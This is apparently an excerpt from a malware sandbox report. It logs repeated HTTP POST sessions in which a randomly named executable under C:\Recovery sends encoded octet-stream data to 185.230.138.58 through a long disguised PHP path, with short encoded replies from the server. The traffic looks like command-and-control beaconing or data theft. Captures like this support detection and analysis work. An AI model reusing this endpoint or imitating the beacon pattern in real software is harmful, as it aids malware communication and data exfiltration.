                                                                                                                                        Data Ascii: W^ZZ_@Q^[YQVY]XPV\]\Z[[@[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX"8!3#%<)1 .)2;9</&=;3'*^$:'^& X/
                                                                                                                                        Dec 21, 2024 10:08:11.362685919 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:08:11.597702026 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:08:11 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        37192.168.2.449805185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:08:11.879903078 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:08:12.233107090 CET1012OUTData Raw: 52 50 5f 5e 5f 45 51 5f 5b 59 51 56 59 5e 58 50 56 5f 5d 57 5a 5f 5b 41 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: RP_^_EQ_[YQVY^XPV_]WZ_[A[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!/1 #,%Z"Y>% =%)%=\?9('>80:3'^& X/8


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        38192.168.2.449806185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:08:13.042103052 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1892
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:08:13.388961077 CET1892OUTData Raw: 57 51 5f 5e 5a 42 51 54 5b 59 51 56 59 52 58 5d 56 5f 5d 5b 5a 50 5b 48 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WQ_^ZBQT[YQVYRX]V_][ZP[H[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!C82'#7X2<%>>5 >==$[&(9Z+:/U3>#$4)0:'^& X/
                                                                                                                                        Dec 21, 2024 10:08:14.287543058 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:08:14.520258904 CET349INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:08:14 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 39 38 0d 0a 01 1f 25 10 23 26 38 0d 32 3e 27 55 33 00 2a 10 2b 07 27 5d 26 3f 2d 07 23 0a 3c 5d 3e 11 02 02 25 3e 00 16 30 3f 28 1f 3c 23 34 02 2d 1a 20 46 04 1c 23 15 3c 23 32 57 3d 16 38 58 2c 06 2a 06 2b 0c 25 07 21 02 2d 1f 37 10 0b 06 20 1f 29 51 2b 29 00 18 29 1a 28 5f 2e 3d 3e 5b 21 10 23 56 0b 1f 3a 0e 3d 30 22 5b 24 24 27 00 32 0e 3a 54 34 26 34 0e 35 1c 0a 0f 21 2d 09 11 26 16 22 10 36 5e 24 55 3d 01 32 5e 32 17 3b 0f 39 07 26 52 20 0c 29 50 05 35 57 52 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 98%#&82>'U3*+']&?-#<]>%>0?(<#4- F#<#2W=8X,*+%!-7 )Q+))(_.=>[!#V:=0"[$$'2:T4&45!-&"6^$U=2^2;9&R )P5WR0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        39192.168.2.449807185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:08:13.164305925 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:08:13.514060974 CET1012OUTData Raw: 57 55 5f 5f 5f 42 51 50 5b 59 51 56 59 5c 58 58 56 5d 5d 5a 5a 58 5b 46 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WU___BQP[YQVY\XXV]]ZZX[F[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX",T,^#?Y$,_=.T#&_)?2(9\<7U0<X3.]'*'^& X/0
                                                                                                                                        Dec 21, 2024 10:08:14.425508022 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:08:14.664474010 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:08:14 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        40192.168.2.449813185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:08:14.914807081 CET425OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Dec 21, 2024 10:08:15.263958931 CET1012OUTData Raw: 57 51 5a 5f 5f 48 54 53 5b 59 51 56 59 5e 58 5e 56 53 5d 5f 5a 5c 5b 42 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WQZ__HTS[YQVY^X^VS]_Z\[B[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX";2_ $/&X(.94X6\=?$\29?:#&.?3$=''^& X/8
                                                                                                                                        Dec 21, 2024 10:08:16.158515930 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:08:16.393408060 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:08:16 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        41192.168.2.449819185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:08:16.634856939 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:08:16.982619047 CET1012OUTData Raw: 52 52 5a 5f 5f 47 51 5f 5b 59 51 56 59 5d 58 5a 56 53 5d 5b 5a 59 5b 49 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: RRZ__GQ_[YQVY]XZVS][ZY[I[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!C/!8] <;%,Y=>*">==? Z&8(9+$-$$3:'^& X/
                                                                                                                                        Dec 21, 2024 10:08:17.894032001 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:08:18.128541946 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:08:17 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        42192.168.2.449825185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:08:18.380384922 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:08:18.732736111 CET1012OUTData Raw: 57 54 5f 59 5f 46 54 56 5b 59 51 56 59 5b 58 5f 56 58 5d 57 5a 5e 5b 47 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WT_Y_FTV[YQVY[X_VX]WZ^[G[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX"; Y!/$26Y*>&R7.==<(X&86+9?U'_&'.''^& X/,
                                                                                                                                        Dec 21, 2024 10:08:19.629281998 CET25INHTTP/1.1 100 Continue


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        43192.168.2.449826185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:08:19.654561043 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1880
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:08:20.013884068 CET1880OUTData Raw: 57 55 5a 5b 5f 40 54 52 5b 59 51 56 59 5a 58 5f 56 53 5d 59 5a 5f 5b 44 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WUZ[_@TR[YQVYZX_VS]YZ_[D[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!F;2<!<($<-*[94>));&]+73,Y'4>Y':'^& X/
                                                                                                                                        Dec 21, 2024 10:08:20.918703079 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:08:21.152442932 CET349INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:08:20 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 39 38 0d 0a 01 1f 26 00 36 25 01 56 31 13 28 0a 30 2e 29 00 2b 00 09 17 27 02 39 45 22 23 16 1b 28 3f 2f 58 24 2e 25 06 26 2f 2c 1d 2b 33 2f 12 2d 20 20 46 04 1c 20 00 28 23 22 51 2b 28 2b 01 3b 16 07 5b 29 22 22 5c 35 3c 26 02 37 10 26 5c 34 32 3a 08 3f 00 22 57 3d 24 27 03 39 10 0f 02 20 3a 23 56 0b 1f 3a 0e 3e 20 29 00 30 51 20 5e 27 34 26 54 23 26 0a 0a 36 0b 28 09 21 5b 3c 05 32 06 3a 11 21 28 3c 1e 28 3c 2d 02 26 39 2b 0d 2e 07 26 52 20 0c 29 50 05 35 57 52 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 98&6%V1(0.)+'9E"#(?/X$.%&/,+3/- F (#"Q+(+;[)""\5<&7&\42:?"W=$'9 :#V:> )0Q ^'4&T#&6(![<2:!(<(<-&9+.&R )P5WR0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        44192.168.2.449827185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:08:19.775046110 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:08:20.123228073 CET1012OUTData Raw: 57 51 5f 58 5a 44 54 56 5b 59 51 56 59 59 58 5c 56 59 5d 5a 5a 58 5b 48 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WQ_XZDTV[YQVYYX\VY]ZZX[H[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!C-" #%<=>* ->,1)\):7T''3'X3:'^& X/$
                                                                                                                                        Dec 21, 2024 10:08:21.036092997 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:08:21.272324085 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:08:20 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        45192.168.2.449833185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:08:21.506724119 CET425OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Dec 21, 2024 10:08:21.857980967 CET1012OUTData Raw: 52 54 5f 50 5a 40 51 52 5b 59 51 56 59 52 58 5a 56 5f 5d 5d 5a 5b 5b 49 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: RT_PZ@QR[YQVYRXZV_]]Z[[I[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!G/2?!, &,6_)>6 .&*8X%(<*/T08_34:''^& X/
                                                                                                                                        Dec 21, 2024 10:08:22.787072897 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:08:23.024940014 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:08:22 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        46192.168.2.449839185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:08:23.277998924 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:08:23.623420000 CET1012OUTData Raw: 57 51 5f 50 5a 47 51 57 5b 59 51 56 59 5c 58 58 56 52 5d 5e 5a 5d 5b 46 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WQ_PZGQW[YQVY\XXVR]^Z][F[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!/?7<<$?9)--#=*'18&+:?S',^'4)''^& X/0
                                                                                                                                        Dec 21, 2024 10:08:24.524425030 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:08:24.760943890 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:08:24 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        47192.168.2.449845185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:08:25.011260033 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:08:25.357800961 CET1012OUTData Raw: 57 57 5a 5a 5f 44 51 50 5b 59 51 56 59 5f 58 50 56 53 5d 5b 5a 5a 5b 49 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WWZZ_DQP[YQVY_XPVS][ZZ[I[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX"/"37<,$<X).:U#>+??&;5+9U3;$$&\$*'^& X/<
                                                                                                                                        Dec 21, 2024 10:08:26.266170979 CET25INHTTP/1.1 100 Continue


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        48192.168.2.449846185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:08:26.276355982 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1892
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
